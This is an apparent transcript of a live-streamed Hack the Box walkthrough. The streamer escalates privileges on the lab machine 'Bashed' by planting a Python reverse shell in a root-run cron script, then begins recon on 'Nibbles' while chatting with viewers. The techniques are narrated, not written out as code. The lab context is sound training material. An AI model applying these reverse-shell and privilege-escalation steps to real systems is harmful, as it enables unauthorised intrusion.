Bangladesh. I'm a student of cybersecurity. Nice, nice. Welcome in. Welcome in. Let's see if there's an exploit for this one. But yeah, there's nothing in like the script manager's home directory at all. I just couldn't find any scripts. And nothing popped out in the LNP's output either. Sudo Baron. What is he? What kind of exploit is this? This is using Python. That's good because that's what we need. I know Python scripts will work on this machine. I can't run anything that's C, which is the worst. I feel like if I could run the C scripts, then I would have had privilege escalation already. I did check the slash directory like briefly. I mean, I didn't dive really deep into it. Nothing stuck out to me immediately when I did that. But we can always check that. But I'm gonna, like I said, I'm gonna keep trying these CVE numbers that pop, especially the ones that are, you know, exposure probable and highly probable here. I just don't know which one of these to run. There's so many of these to run. .5 CentOS. Choosing exploit for Linux distributions that try exploit nss.py first. Alright, well, let's try that then. Where's that at? This one. Copy raw file. Nano exploit dot py. Paste that in here, and then we will Python 3 exploit.py. See what happens. Oh my god, the GLIBC is too old for everything. Oh my god, this thing's killing me. It's kicking my butt. Yeah, I don't think there's a way to update it, dude. If I don't have root privileges, right? Alright, well, back to the drawing board. We're like, oh, we found a Python script. We shouldn't use glib, whatever it was. Buy a MacBook, you'll thank me later. I don't want a MacBook. Why would I want a MacBook? There's nothing wrong with MacBooks, but it's just weird to me, man. I grew up using Windows machines, and then I've learned how to use Linux later in life, and yeah, I just can't Yeah, MacBooks just, they confuse me. Like the whole, how they don't have like two clicks. They got like one button and then you have to like hold down the, what is it, the command button to do a right click or something. It's just weird to me. I bet you did it on purpose so the room isn't too easy. They probably did. They probably did. That is 100% factual. There's so many other CVEs to try though. Let's get these probable ones and we'll look at the Linux explicit gesture 2 output here. What's up, DK? We're going to stream. Thanks for stopping in. Glad to see you here. What's the brand of your gaming chair? This is a DX Racer. This is like one of the old ones. I bought this chair in 2015. This is a very old chair. So they might not even sell this exact one, but this is a DX Racer, and it's very comfortable. And I, you know, back when I did Twitch streaming, gaming Twitch streams, back in the day, back in like 2015, 2016, this was like the best chair in the market, I thought. Well, no, it was like the only gaming chair, honestly. GX Racer was like the original brand, you know, and everyone copied them. But I bought a gaming chair about a handful of months ago. Yeah, about a half a year ago now. Man, it was so uncomfortable. Like, it sucked. And it's shaped exactly like this, too. I don't know what it was about it, but it just didn't fit my body well, no matter what. But this one here, great. But the thing is with DX Racer, though, is nowadays, like I said, I don't think they sell this exact model anymore. And DX Racer is stupid expensive. So, honestly, what I recommend for computer chairs, this isn't my real computer chair. So, I actually moved from Alaska to Ohio. And this is just something that I had chilling at my parents' house. As a matter of fact, I gave this chair to my dad, but I borrowed it. I gave this chair to my dad because when I joined the military, I couldn't just take everything with me. So I'm like, here, you can have this chair, you can have this. I gave a lot of stuff to my parents actually, and then basically I'm just borrowing it until my real chair comes. But I have a Shaquille O'Neal executive chair, and that thing, the best chair I've ever sat in my life. They're pricey. I spent $400 on it, but dude, I can sit in that chair all day, every day. I got it out from Office Depot. So my recommendation is just go to Office Depot and sit in a bunch of chairs, see which ones you like, buy it, and then I don't recommend buying chairs that you don't sit in. Because like I said, I bought a gaming chair, shaped nearly identical to this one, and I'm like, this one's really nice. And it sucked. It sucked, man. But the thing with chairs is just weird because I end up selling that chair to my friend, and he loves that chair. So just because it's comfortable to you doesn't make it comfortable to other people, and just because it's comfortable to other people doesn't make it comfortable to you, because everyone's got a different body. So it's hard to really gauge like a chair's comfortness from reviews, because the chair was highly reviewed. You know what I mean? So that's why I highly recommend, if you're gonna buy a chair, just go to the Office Depot or whatever place that sells office chairs and just start sitting in all of them and see how you like it. Buying chairs online without sitting in them first is a huge risk, and especially if you're going to dump hundreds and hundreds of dollars. Alright, so back to the exploit. Sorry, I ramble about chairs, but I can talk about computer chairs all day, man, because I think the computer chair is one of the most important things you can have to be effective in this field, because the longer you can sit at your computer comfortably, the more work you get done. And the more work you get done, the more you learn, and the more valuable you are in the field. So I highly recommend it. Investing as much money as you can possibly invest into a chair. Like I said, I spent $400 on my chair, and it hurt me. I'm like, oh my god, $400 for a chair? But one of the best investments I ever made in my life. This is also C, so we're not going to download this. No, wait. Yeah, it is. Oh my god. I'm glad YouTube recommended your channel. Thanks, man. Thanks for clicking, and hopefully enjoy the stream. I know I went on a ramble there. We're gonna get back to hacking now. Local privilege escalation. What's this written in? This is written in Bash! This is written in Bash! We got a chance! The name of the machine is called Bash, so this might work. It's a Bash script, baby. But we'll see. Nano exploit 2.sh. Cat exploit 2.sh. Oh my gosh. Cat exploit 2.sh. So what's this doing here? Type password 1 and hit enter for root. Okay, that's easy enough. Alright, chmod plus x exploit 2.sh / exploit 2.sh. Password. XOR command not found. Type password 1. I don't think it's gonna work. Yeah, this is overwrite shadow file. XOR is not in. Yeah, XOR command not found. Well, that's whack. Well, that didn't work, guys. We gotta find script manager stuff. I think we gotta find a script. That's the only thing I can think of, guys. Let's do. Let's go back down. Let's try this one. Let's keep going down the list of CVEs here and see if we can find stuff that is not written in C. It's written in C. I'm very beginner. Our class will start soon. Someone suggests me to start with WASP Top 10 2021 and try Hack Me. Should start with this or follow our university syllabus. What I would do is I would follow your university syllabus and do try Hack Me. Do both. I would do both. That's what I did. It's possible. I wouldn't recommend anything that was impossible to do, but it's definitely possible. I mean, I had a full-time job. I was a part-time college student, and I was doing try hack me and getting certifications in my free time. I was obsessed with it. I was trying to learn as much as I can in the shortest amount of time possible. Now I work a full-time job, and I'm a full-time college student, and I still do Hack the Box on the side, and I still study for certifications and make YouTube videos. So you just gotta find a time. I would do both. I would do as much as you can. If you're doing just college, I don't think that's enough. Personally, I don't. And as a college student, like I said, I'm a full-time college student right now. And I have a full-time job. And I still do Hack the Box. And I make YouTube videos. But I'm a workaholic, so I don't have a life. I don't have my social life isn't very good. Just and I don't take part in a whole lot of other hobbies. I quit playing video games and I just focus on this. cybersecurity is a hard field to break into. So the more time you put in, the better chance you have to break into the field. And then once you break into the field, maybe you can slow down a little bit because you're in the field. But if you're trying to break in, you need to be, especially if you're young and you don't have a whole lot of responsibilities, like you don't have a family to take care of, I would just go insane on the work, man, when you're young. You, David Baldwin, and Hayward Chuck should make a YouTube video. Well, that would be cool, but they're like, Network Chuck has like 4 million subscribers on YouTube. David Baldwin has like 2.5 million, and me, I have 2,500. So they are killing me in terms of views. So I don't know if they'd want me on the show. I'm a fan of David Baldwin and Network Chuck. Matter of fact, I just watched their last interview. It's like almost 2 hours long about how to hack the YouTube algorithm because I'm trying to grow my YouTube channel. Because YouTube is incredibly difficult. Matter of fact, YouTube is like the hardest thing I've ever done in my life. Like trying to get people to click on your videos and stuff. It's hard. So I was like, oh, they were talking about how to grow a YouTube channel. So I got a couple tips from Network Chuck and a couple tips from David Baldwin that I'm gonna apply for some of my videos. And but yeah, I mean they're way out of my league. They don't even know who I am, you know. But I do like Network Chuck and David Bombal. Matter of fact, David Bombal is the main reason why I have a CCNA, that's a Cisco Certified Network Associate. His course was premium, was one of the best courses for CCNA ever. And I used to watch a lot of Network Chuck when I was up and coming. But as I started learning, I realized that I actually surpassed him in hacking knowledge. A lot of his stuff is very beginner friendly. And once you get to a certain level, Network Chuck stuff is very beginner friendly, which is really good to get people in the field and to get people excited about the field. But eventually, you're going to look at it and like, wow, I already know this. You know what I mean? And that's not taken away from Network Chuck. Network Chuck is, I would say he's got a wide array of like knowledge, but he doesn't go really deep. And he says that in one of the videos. He's like, look, I just tell you like how to get started, and then it's on you to like go deeper. And I'm like, that's exactly what his channel is for. And they're entertaining too. All right, let's see here. I wish I had Network Chuck's. I wish I had Network Chuck's YouTube skills, man. I wish I knew how to grow a YouTube channel like he did. This is a self-contained. This might work, guys. This is a bash script. Let's use using SoCat. Do we have SoCat on here? SoCat. I'm 100% sure they know who you are. No, man, they know a lot of people out there. I like smaller YouTube channels because you can actually talk to the creator. Yeah, I mean that's true. Yeah, that's 100% factual. You can talk to the creator when it's smaller. You can still talk to the creator when it's bigger if they're doing a live stream, but you usually got to do like a super chat. I've actually did that in one of Network Chuck's live streams, but that was a few years ago actually. It was like 4 years ago. I went in Network Chuck's live stream and I think I gave him like $5 just to ask him a question or something. So I mean they're available, but it costs you money to get their attention though, unfortunately. This doesn't work because this doesn't have internet access. I can't install SoCat. This isn't gonna work. Just take SoCat. Right, I think that's his target audience. Yeah, I mean the beginner friendly stuff is the target audience. Me, I try to make some beginner friendly content, but I also like to make some more advanced stuff. Like this right here, what we're doing is not that beginner friendly. but I do want to make some more beginner-friendly content because one of my goals with the channel is to get more people into the field, and you got to make beginner-friendly content to get more people excited about the field. I get offended when you look at kids and you ask like a child nowadays, like, hey, what do you want to be when you grow up? They're like, I want to be an influencer. I want to be an Instagram model. And it's like, bro, like, be a scientist, be a doctor, be, you know, an engineer or something, you know, be something cool. And it's, you know, engineering and science isn't cool anymore, you know. I guess it never was cool, but it would be cool to get people excited about computers, you know. I'm trying to make hacking cool. As long as my videos keep helping people, I will try and keep pushing out videos. I didn't know you made videos, man. I'm gonna have to check your channel out. Let's look. I didn't know you made videos, man. You should have told me that earlier. Let's look here. Nice, man. I'm gonna have to start watching some of these. Yeah, 233 videos. That's nice. Dude, I didn't know you made videos. That's cool. I'm gonna subscribe. I'm subscribing to you right now. Subscribe. Your thumbnails are good, man. Do you use AI to generate some of those thumbnails? Your new thumbnails are really good. I use it just the free ones until AI came out. Yeah, I use AI all the time to generate. I like to use AI to generate the background, and then I take a picture of me and then put me on there, and then I usually put some text. But my background and all my thumbnails is almost always AI generated. And then I type whatever text is on the thumbnail, and then I just slap a picture of myself on there. I don't want to be famous to consider to be an influencer. I don't do anything fancy. Mainly track me stuff. What's up, July S? Hello, I'm in experience with penetration testing. How do companies typically price their pen tests? Could you provide an example if possible? Man, I wish I could tell you. I wish I could tell you how to price a pen test. It's hard. I'm not sure, man. I've never sold a pen test. I'm just a pen tester that does the work that someone else. So my company, they're the ones that prices the pen tests. They're the ones that sell the pen tests. That's on the salespeople and the management of my company. And then once they sell the pen test, they tell me to do the pen test. But yeah, I mean, if it's for freelance work, or if you in your own company, I really can't help you there. I've never sold a pen test. I've never priced a pen test. So I'm not going to try to sit here and try to tell you how to do something that I've never done. But if you figure it out, let me know, because that'd be interesting to know for sure. You use the Bing image creator in Canva's AI? I'm going to look that up because your thumbnails are good, dude. I use ChatGPT, and sometimes ChatGPT makes some pretty bad images. It can make some good ones, but yeah. I'm gonna have to try those tools out, man. I think back in the day, ChatGPT was killing everybody, and I just never got off of it. And I gotta try this Bing. Bing I used for a while, and I just didn't like it. But obviously, that was like a year or two ago. And I guarantee you it's way better now. So I gotta give it another chance. What's up, Mr. X? Welcome to the stream. Thanks for stopping in. Glad to see you here. Just discovered the channel. Thanks. You're a beginner. Well, welcome to the channel. We're hacking, what's the name of this machine? Bashed on Hack the Box. Right now we're in the middle of privilege escalation. For those who's tuning in, we're trying to privilege escalate from script manager to root. And what's this? Oh. Yeah, okay. I really want to do volunteer work for local schools. I'm trying to see them get hacked by the bad guys. Yeah, I was thinking about doing something like that myself, but I was trying to see if like, because I just moved back to my hometown like 2 weeks ago. I was seeing if like I can go to my high school or something, and I'll like go to like a career day and like just tell kids like how cool hacking is and stuff, and try to get like one person to join cybersecurity in college or something. That'd be a win. Because I wish when I was in high school, because I didn't do cybersecurity right out of high school, guys. I was working at oil refineries. So if someone would have came to my classroom and been like, "Hey, you can make money hacking computers," I would have been like, "What? That's amazing!" And I would have been all in on that, you know. But no one told me that. No one, you know, cybersecurity wasn't really talked about that much back then. So it still isn't talked about that much now today. I mean, it is, but at the same time, it's not getting pushed as hard as some of the other professions out there, I don't think. Did we look this one up? Which was, man, I'm lost. We're rambling a lot, guys. Let's keep pushing here. So 34. What? Where'd I get this number from? What did I search? Where did I get the CVE number from? I don't see the CVE number in my output. Huh. Oh, here we go. Oh. Let's keep pushing, guys. We gotta try hard. You put WannaCry in your whole school district? Bro, that's a crime. What are you doing? Don't do that. It's illegal. We don't advocate for illegal hacking out here. Bro, you need to not tell people that. You can go to prison for that, bro. Like, I would not tell people that. There was a guy, you ever listen to Darknet Diaries? There's a guy that did something similar. He like hacked his entire school and he went to prison for it. Do not hack your school, guys. Even if it's a prank, I'm telling you, you'll get in trouble. Do not do that. Do not hack unethically and illegally. Frontier GPT 3.5 to find exploits with prompts. Today's days. I never used Frontier. What's Frontier GPT? I never used that. What's up, CJ Styles? Thanks for stopping in. Glad to see you here. Yo, Flow7X, I missed your message, but thanks for stopping in. Glad to see you here. Always get permission or the feds will be knocking on your door. Yeah, that's a fact. I need to make someone a mod so they can start deleting comments about people hacking illegally. I didn't think it was really a problem. Do not hack illegally, guys. It's not cool. And you're gonna get in trouble. What chat is that in? That was in the YouTube chat. He said that in. I feel like, yeah, most people's on the YouTube chat. GLIBC? Dude, I don't have that. How do I exploit this? Oh, this is so annoying, guys. This is rough. There's gotta be something here. The shell. So the last few streams has been initial access was hard and the PE was easy, but the initial access was easy this time and the PE is hard this time around. All these are kernel exploits. SUID position independent. Once again, this is written in C, guys. Alright, well, let's keep looking around. I don't think it's CVE at this point. I don't think the CVE is the way to go. There's gotta be a script somewhere, right? I mean, it's called script manager. I don't think anything that you don't have written authorization for. Oh yeah, don't hack anything you don't have written authorization for. Right. Okay, it was an accident, I was just asking. How do you hack on accident? I mean, I guess if someone put like malware on your flash drive and you plugged it in and you destroyed your entire network, that would be an accident. Writable listener. I don't know. .socket files. Sites enabled. Default conf. Analyzing PGP file. I don't know what that means. What's a GPG file? Oh, look at that. Home ARXL sudo as admin successful. That looks extremely interesting. Maybe we wasn't supposed to migrate over to Script Manager, guys. You ever think about that? I don't think I can go to this one. Oh, I can. ls-la. Bash history is going to dev null. Sudo as admin successful. That's very interesting. Cat sudo as admin. What's that even mean though? There's nothing in that file? When I do cat sudo as admin successful? That's weird. Cat dot bash history. Nothing. I was going to dev null, so that makes sense. What's sudo as admin successful? I don't know, guys. Doesn't. Let's go back to our limpy's output here. If I don't see anything that sticks out to me, we're gonna grab a hint for the privilege escalation here, because we're over 2 hours for the stream at this point. Sudo version was vulnerable, but we couldn't take advantage of it. It wasn't working. Sudo as admin successful. That's really interesting, but there's nothing there. Maybe. What would say permission denied if I couldn't read it? Unexpected en route /scripts. Well, how can I read that? If I had root access, then I wouldn't be running linpiece. Scripts /test.txt. Permission denied, yeah, obviously. It's en route. I don't know why that highlighted red. /scripts. Wait, hold on. Is there a scripts directory? Oh, here it is. Wow, we missed that. Change directory scripts. Ah, there we go, baby. All right. Cat test.py. Cat test.txt. Testing 1, 2, 3 super. Testing 1, 2, 3 exclamation point script manager at bashed. That seems like a password or something. Let's run sudo something. Sudo -o. Is that the password? That's not the right password. I just cleared my lin piece, but I think this is where we're at. So let's do ls-la. Read execute. Root. Cat test.txt. Testing 1, 2, 3 exclamation point script manager at bashed. What does that mean though? Cat test.py. Testing. What if we do Python test.py? Permission denied. Permission denied test.txt. What? What do you mean permission denied? I can read. It's trying to open test.txt, but then it says permission denied, but I can read. I can read test.txt, so that's what I don't understand. Testing 1, 2, 3 exclamation point. Oh, you know what? That's not. It's just saying testing 1, 2, 3. This has nothing to do with the password. Okay, well. What's up, Ashish Mina? Welcome to Stream. Thanks for happening. Glad to see you here. I can't wait to find my first bug or CVE. Yeah, that's gonna be that's gonna be a really nice time. I haven't done any bug bounty or CVE hunting, but eventually I will get into that. I'm still in my learning phase right now. I don't understand how I can read test.txt, like I can cat it out, but then when I run Python test.py, which in test.py hold on. Oh, you know what? Can I nano test.py? I can. But what is that going to do for me? Can I replace the file? That's what I'm thinking. But is it running it as root though? I don't think it's running it as root though. That's the problem. Root owns test.txt. I don't know. I don't know what to do. There's got to be a way to take advantage of this. I'm not thinking of it. Cat test.py. So it's just open. So all this does is just opens up test.txt and it writes something into oh, all right, let's try this out. I got it. What if we did this? Remove test.txt. No, that doesn't work. So I can't write. I can't write into test.txt. Open. Yeah, I don't know, man. Because, like, test.py I can write, but it's not running as root, though. You know what I mean? But root owns test.txt. Test.txt. No write permission. Okay, I have read permissions, but no write permissions. So I can read the test.txt. That doesn't do any good because test.txt is just testing 1, 2, 3, so that doesn't help me out. This might be a rabbit hole, guys. I don't know. Test.py. So I can open test.txt, but I can't write to test.txt. I don't understand how this script works. I don't think this script is. This has got to be a rabbit hole, dude. Script manager owns test.py. The fact that we're script manager and there's a scripts directory and there's scripts that are owned by script manager, I think I'm on the right track. I just don't know how to take advantage of this. That's the problem. Try editing the file. I mean, I can write whatever I want. Like I could do like, you know, well, we can't write to reverse shell connection. I mean, we're already script manager though. I mean, if I can run this as root somehow, which I can't. Like if I could, like that makes sense. If this was running as root, I could definitely, but it's not running as root. If I run it, it's just going to run a script manager. I would get a reverse shell with script manager if I modified test.py. It's writing to that file, which is owned by root. Maybe it has similar permissions. Yeah. Maybe. But I mean, it doesn't work. If this worked, if test.py, oh, Python, if this worked, then it would make sense, but it's giving me permission denied. So this script is not running as root. If it was, then we wouldn't be getting permission denied on test.txt. How can it write to test.txt if it doesn't have some sort of elevated permissions? That's, well, maybe, can I run sudo? See, I don't know the password for script manager. That's the problem. If I need the password for script manager, this would be a different ball game, man. I don't know, man. I don't know how to take advantage of this. I'm going to go to guided mode. You think it's worth a try? What's up, Rogue? For the welcome to the stream. Thanks for stopping in. Well, let's do a copy test.py to test.py.copy. That way we have a backup of this. And I mean, sure. I mean, I guess it is worth a try. I don't think it's gonna work though. But we can just do this Python 3 reverse shell here, the one that we used earlier, and just do nano test.py. But from my understanding of the way the permissions are right now, I truly don't think this is gonna work. Alright, we'll start a listener and then we'll run Python 3 test.py. So we should get a reverse shell. My expectation is of getting a reverse shell as script manager. If it comes back as root, color me impressed. It didn't work. Why did that not work? Why did that break? What if we just run it? No. I'm not entirely sure why that broke. R port invalid syntax? How is R port invalid syntax? I don't understand that. Why is that not working? It worked earlier. That's how we got my shell to begin with. Try to remove export. What's up, Anthony? Thanks for stopping in. How you doing today? Is it any double quotes? It's already in double quotes. Remove export? Alright. Worth a shot, I suppose. Now I got a different error. let's try a different Python then. Let's try Python number 1. That's kind of confusing to me. I don't understand why it worked earlier, but now it's not working. Same thing. What? It's not making no sense. Let's try this again. Oh, that's not gonna work. Python Windows, Python. There might be. The attacker's code. What the server? Try any import? These are the same stuff that we were just trying. These are one-liners, so, I mean, I don't know, man. There's 2 exports. Did you remove export like this? I'm not entirely sure you mean, Anthony. Well, this works, but let's see if this works. We want to connect to 443, and then we want to connect to 10.16.29. Python test.py. Can I import name run? Yeah, man, I don't know. I'm gonna go to guided mode. We're running out of time, guys. I don't think it's gonna work anyways. I'm sitting here trying something that I don't think is gonna work. Like, even if I could run a Python script right now to get a reverse shell, I think it would just come back as script manager. What is the user's username? Script manager. We got that. What folder in the system file can script access? What folder in the system root can script manager access? So it's /scripts. So we're in the right, yeah. What is the file name of the file that is being run by root every couple of minutes? Oh, it's being run by root every couple of minutes? Is it? Is it test.py? It's getting run every couple of minutes as root? Ah. Alright. Cron jobs. That didn't pop up in the cron jobs though, guy. And the linp's output though. That's what's kind of confusing. Why? How did I miss that? Did the linp's output? Well, let's just take a guess and say it's test.py. Yeah, how did I miss that? I mean, it makes sense, but at the same time, it's like, I want to know why that didn't pop up to the linp's output. So let's do. So that doesn't change anything. I mean, Guide mode didn't help us too much. Yeah. It did help a little bit because we know this is getting ran automatically by root every couple minutes, but other than that, we were in the right area here with test.py. So let's do /tmp/linps.sh. I'm not entirely sure why that didn't pop up in the cron jobs, dude. That should have been highlighted in linps. Did linps miss it or did I just miss it? That's what I want to know. Where's the cron job section? Output in linps. It does do cron job search. See, it says modify interesting files in the last 5 minutes. Oh, maybe that's not where. I did see somewhere it said script/test.py. That's what made me go look for that, and that's how I found it. But it didn't say it was running as cron, like in the cron jobs. Where's the cron? I don't see anything about cron jobs in here. I thought I did a search for cron jobs. And I could have sworn it said it was empty. Clean processes, blah, blah, blah. It's not cron jobs. Yeah, here's the cron jobs. There's nothing here. You just got user, SBIN, and a cron. There's nothing popping up here in the cron job section. linps really don't check for that, huh? Maybe it's not even running as a cron job. Maybe it is in the processes. You might be right about that. Maybe it's not in cron. Can I do? Isn't it cat etsy cron tab? Yeah, there's nothing in there. Huh. But how do we know it's running every few minutes, though? command. Sudo -u script. Is that what it's running? I want to know. Alright, we just gotta figure out how to modify. I don't understand how we know it's running automatically, though. You know what I mean? I don't see any kind of indication of that. I mean, it does say modified interesting files in the last 5 minutes. So, that's the only indication right there. But I personally, I modified it. I don't know if that's... Some of these boxes are real head scratchers. Yeah, I don't... I mean, I think that's really the only indication, man. I don't see any scripts saying this at all. Oh, well. Yeah, I mean, I guess that's it. That's like the way to find out if something's being modified. Definitely nothing in the cron tab, though. Alright, well, we just gotta figure out how to modify test.py. So I need a Python script that will give us a reverse shell, but I don't know why. I don't know why I can't figure out how to get a reverse shell. We can close out of that, we can close out of that, we can close out of that. What's up, try a one-liner? That's how I was trying, though. I tried all of these. Python reverse shell. This reverse shell guide is way too long. Like, I just wanted a script. Maybe Pentest Monkey does one. Pentest Monkey. Reverse shell cheat sheet. Pentest Monkey. It's good. They have a PHP one that works really, really well. This is also a one-liner, though. I need to be in the file. Can I just do this? Instead of doing Python -C, we'll just copy everything. Why can't I copy the rest of this, dude? I gotta go full screen in this. It just cuts off. This isn't even good. I don't even get the rest of it. It just cuts off right here. That's weird. Python reverse shell script. I want a script. I don't want a one-liner. I need to go in a file. This might work. Nano test.py. Oh, this looks gross. What just happened? That's not what I wanted to copy. I wanted to copy this. Payload all the things. Yeah. We can try that after this. This looks like it works. Port 443. Wonder if it works with Netcat though. It might not. I might need to have the listener as a Python thing as well. But let's do Python test.py, see if it works. Didn't work. Invalid syntax. Dude, what's up with these people's scripts? Do they not like test their scripts or something? I don't understand why. Like every script I try just says syntax error. Let's do Python 3 maybe. Yeah, it didn't work either. Like, I don't understand. There's another way. We don't have to do reverse shell. There's other things we can do. That's too much. Let's do payload all the things Python reverse shell. Reverse shell cheat sheet. Payload all the things Python. These are all one-liners, though. I don't think. Try one of the two on the bottom. No spaces, shorthand. IPv6, Windows only. Shorthand further. Shorthand, no spaces. So I gotta get rid of the Python. You can't paste it in the chat. That makes sense. Python 3. So I just need to copy all of this. Try using a bash script to execute the Python rev shell. That's all, the bros. Thanks for stopping in. Glad to see you here. I don't know why this is so common. I would use ChatGPT here, but I'm really trying to avoid ChatGPT. But if this doesn't work, I'm using ChatGPT straight up. All right, nano test.py. Oh, that's not what I want to do. Nano test.py. So I gotta get rid of the quote, right? And I have to get rid of Python and get rid of the quote at the end here. And then I have to change the IP address and port. There we go, that worked. Alright, we're root now. Nice. There we go. We got the root flag now. Perfect. That took way longer than it should have, but hey, better late than never. Perfect. We still have an hour and 15 minutes. That's enough time to do another box. Let's go ahead and try another box, guys. The rating on this, I'm going to give it easy. I'm definitely going to submit this as an easy. I'm going to give it a very easy. It was pretty easy. It's just I didn't know it was running on its root automatically. The limpies output, I relied on that too much. So limpies isn't everything, guys. That's a big lesson here. And the script directory popped up, and I missed that at first because I just skimmed it and I should have looked harder. But once we found the script directory, we knew like test.py was the thing. We just did not exploit it. And remember, we spent so much time saying, "Oh, it's not running as root," but it actually was running as root every few minutes. But the limpies did show that. I don't know how else to reveal that that's running every few minutes, to be honest with you, other than the limpies was like, hey, this thing ran 5 minutes ago. Files modified within the line. Well, no. Yeah, I don't know, man. Trial and error, that is the way. Yeah, that's true. Can you suggest some machines that I can practice for OSCP preparation, or what type of vulnerabilities and exploits I would need in order to pass OSCP? Honestly, man, that box is a pretty good one for OSCP, I would say. What I would do is I would focus on the OffSec labs, like the OSCP labs. Do as many as you can. I didn't do all of them to pass OSCP, but I would do that. The best boxes are the OSCP lab, straight up. The mock exams also is some of the best training you can get. And yeah, and then also the TJ null list is a good list as well. I've never done a TJ null list. I will do it eventually. I probably have done a few of the new TJ null lists. Let's go ahead and stop this machine. Let's go ahead and go to the walkthrough, see if we did this in the intended way. This walkthrough is actually really bad, but it works. Looking at the information in the directory shows that test.py appears to be executed every minute. How do we know that, though? What do you mean? Looking at the information of the files in the directory shows that test.py appears to be executed every minute. This is inferred by reading test.py. I'm looking at the timestamp of text.txt. Huh? There's no timestamp of text.txt though. Oh, yeah. Yeah, I guess that, yeah, that makes sense, I suppose. A text file is owned by root, so it can be assumed that it's run as a root cron job. A root shell can be obtained simply by modifying test.py to a Python file. That's what we did. So yeah, I guess you gotta look at the timestamp of... I wish I didn't shut that down. Let's go back to my terminal. Yeah, I wish I wouldn't have shut that down, but... It's the timestamp. It was the timestamp, because like if you do like a... Well, the machine's off. Let's go to... Yo, let's change directory to hack the box. Let's just go to blocky for a sec here, and then do an ls-la. Yeah, see the timestamps, dude. You just gotta look at the timestamps, man. That's crazy. We should have paid attention to that. It's the small details. It's the tiny details. Nice. But Limpy's also did show it, though. It said, hey, modified in the last 10 minutes, or whatever. Alright, let's go ahead and close out of this tab, close out of this tab, clear out this tab, and then we will go to our next machine in our list. So let's go back to retired machines. It's already filtered in a way that's just going to show me the next one down my list. So Nibbles is next, so let's go ahead and launch Nibbles. Let's go to adventure mode. I do have a Discord channel. I need to start using it more, honestly, guys. I'm really bad about using Discord. I gotta get that running. I gotta get the Discord set up. Dang, hold on. Let me log into my Discord. And I'll give you the link here in a sec. I hate how the computer logs me out of Discord all the time, but my mobile never logs me out of Discord. It's kind of annoying. Luckily, they got the scan QR code thing from the mobile to the desktop, which is really nice. I'm going to give you the link right now, guys. Mr. Nobot messaged me like 5 days ago. I gotta really check this. I am sorry, guys. I'm dropping the ball here. How do I get to invite people? Alright, I just dropped the Discord link in the Twitch and YouTube chat. Let me go to LinkedIn. I don't know why. Should be streaming on LinkedIn. Alright, I put the Discord invite into LinkedIn, and let me go to Kick now. That way you guys have it as well. I don't have a massive audience on Kick, but there's probably a few people watching over there. Actually, looks like one on Kick. There we go. I'm gonna do better. I gotta do better with getting the Discord set up, guys. So bear with me on that one. I'm dropping the ball. There's a few streams ago someone asked the same question. I would personally stay away from breach forum. That is monitored all up and down by the FBI. Some people consider it a dark web website. It's not, because you don't have to use a Tor router to access it. But yeah, that's a sketchy website. I don't know if you're... I mean, technically you can go there as long as you're not buying and selling the information there. But I don't know. I would avoid it. Alright, let's go ahead and start the next machine, which is Nibbles. So go ahead and copy our IP. Well, yes, copy our IP address. We're going to do up arrow key. We're going to do our Rust scan again. For those who are just joining and didn't see the Rust scan earlier, Rust scan is a very fast port scanner. It's a lot faster than Nmap. It uses Nmap in the background, but it does produce results faster. You can see we got 22 and 80 already open. We're going to run this again because it's so fast sometimes it misses ports, so we'll run it one more time. So once again, 22 and 80, so we can actually navigate to this IP address, hello world. So we've got a live website here that doesn't really have a whole lot going on, so we got to fuzz this. 22 is open. We're also going to run this Nmap scan on port 80 and port 22. And then for those just joining, I mentioned it earlier, so if you're watching a past recording, you can rewind and watch it. But basically, we're just doing a very comprehensive Nmap scan here on port 80 and 22. It's going to give us a lot of information about these two ports that are open here. In the meantime, we're going to do Ferox cluster again. Good old Ferox cluster. It's going to be easier. Instead of doing up arrow key, it would just be easier just to type in FER. And then we will paste our IP address and we will fuzz the crap out of this and see if we can find anything useful. Stolen content's a no-go? Someone was stealing content and put it on breach forums? Well, I mean, if someone put an ethical hacker course, I mean, if it's not stolen, then I guess it's okay. But it's probably stolen if it's on breach forum. Breach forum is extremely sketchy. How much is pen testing really? What do you mean by that? Like, how much does it cost to get into pen testing, or how much money do you make while being in pen testing? Please clarify your question. Aslo being also welcome to stream. Thanks for happening. Glad to see you here. Is it true that real world pen testing we still find vuln like LFI, RFI, and log poisoning? Yeah, man. I mean, the LFI still shows up in real world pen testing. I would say most of the real world pen testing is just mostly bad patch management. And for me, I find a lot of cross-site scripting on web apps, man. It's very easy. Sometimes like I can find cross-site scripting right off the rip in a web app, and it's not hard to find cross-site scripting in web apps, man. SQL injection as well. My coworkers find SQL injection pretty regularly. What's the number after R? That means a range for Rust scan. R for range. 1 through 65,535. That's every single port. Alright, so there's no CVEs that are popping here. So the only thing that I can come up with, the only logical conclusion is that this is actually the shortest MF scan results I've ever seen. So there's no information here. 217? Did I provide that? Oh no, I didn't give it the right IP address. That's why. No wonder why. Let's give it the right IP address here and try that again. See what we got on Ferox Buster. Did it find anything? Didn't find anything on Ferox Buster. yet. I heard a guy who's 21 made $1 million doing bug bounty. Is that true? Possible? It's absolutely possible. It's I would say that's incredibly difficult. But I have seen people post $10,000 bounties on LinkedIn and Twitter and stuff. But you gotta find a lot of vulnerabilities to get it to $1 million. You know what I mean? It's possible. Absolutely. There's people who have done it. But it takes a long time to get there. But it's absolutely 100% possible. And it's 100% true. But it's extremely difficult. Extremely difficult. You gotta be really good at what you do. You have to know your stuff. And you have to do bug bounties a lot. Like, you have to be in the bug bounties every day. All day. If you want to make $1 million. But I mean, you don't need $1 million to make a good living, though. I mean, there's plenty of people that are not $1 million hackers that are making a good living. How am I doing money wise? I would say I'm doing pretty good. I'm doing good. I'm getting paid well. I'm over 6 figures. I think a lot of people are mesmerized the money instead of looking at how long it takes to get there. It takes a long time to get there. Like, I mean, when I say I make over 6 figures, like, it took me 5 years of learning before I even got to that point. You know what I mean? It takes a long time to get to that. It takes a lot of training. We didn't get nothing on Ferox Buster, guys. Let's try secless. Oh gosh, that's a lot. What just happened? Is there a secless? Seclist. Seclist. Fuzzing. Fuzzing. Let me go back over here to my. Let's just paste this file in here. I can't believe I didn't find anything on the fuzz. Didn't find anything with the directory list medium. Did I do the command right? HTTP 141. Did I do the right IP address? Yeah, I did. 33. Yeah, that's the right IP address. And we have a web server here. 141. 141, yeah. The web server's working. See if we can do large files, see if we can get anything here. I'm a full stack dev nerd in India. That's good though. I mean, development background is good. I mean, you can find a lot of vulnerabilities in web apps as a with a development background. That helps you a lot. You don't have to have a development background to be an effective web app hacker. I have a coworker who doesn't come from a development background, and he's a really good web app hacker. And I'm pretty good at web app hacking as well. I'm not a developer either. I came from a system administration background. Yeah, we might need to do. I like how you asked 